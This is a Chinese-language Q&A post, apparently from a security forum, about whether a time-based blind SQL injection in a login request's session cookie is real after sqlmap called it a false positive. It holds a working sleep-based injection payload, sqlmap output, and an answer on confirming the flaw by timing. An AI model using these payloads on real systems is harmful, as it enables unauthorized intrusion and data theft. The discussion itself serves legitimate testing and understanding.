基于时间的盲注 SQL 注入

Question

通过 Burp Suite 中继器中的以下请求，我注意到我能够在目标服务器上执行 SLEEP 查询。

POST /login HTTP/1.1
Host: example.com
Origin: https://example.com
Cookie: _sessionToken=filzxrpoiahflw_1618561576'%2b(select*from(select(sleep(20)))a)%2b'
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Content-Length: 39

username=admins0&password=m02pih57d

但是，当我使用 SQLmap 测试端点时，它说这是误报。

[xx:xx:42] [INFO] Cookie parameter '_sessionToken' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided risk (2) value? [Y/n] Y
[xx:xx:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[xx:xx:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[xx:xx:01] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[xx:xx:06] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[xx:xx:09] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[xx:xx:13] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[xx:xx:19] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[xx:xx:23] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[xx:xx:27] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[xx:xx:31] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[xx:xx:35] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[xx:xx:39] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:43] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[xx:xx:48] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[xx:xx:52] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[xx:xx:12] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[xx:xx:16] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[xx:xx:19] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[xx:xx:23] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[xx:xx:27] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[xx:xx:31] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[xx:xx:35] [INFO] checking if the injection point on Cookie parameter '_sessionToken' is a false positive
[xx:xx:40] [WARNING] false positive or unexploitable injection point detected
[xx:xx:40] [WARNING] Cookie parameter '_sessionToken' does not seem to be injectable

我想知道攻击者是否有可能执行SLEEP 查询而不注入端点（并且通过扩展无法转储数据）？如果是，如何（服务器代码是什么样的）？

Answer 1

如果可以通过repeater执行，那么就不是误报了。

监控响应时间增加时间，如下图。

睡眠(2)

睡眠(20)

如果你得到这样的响应，那么攻击者可以用同样的方式执行睡眠查询。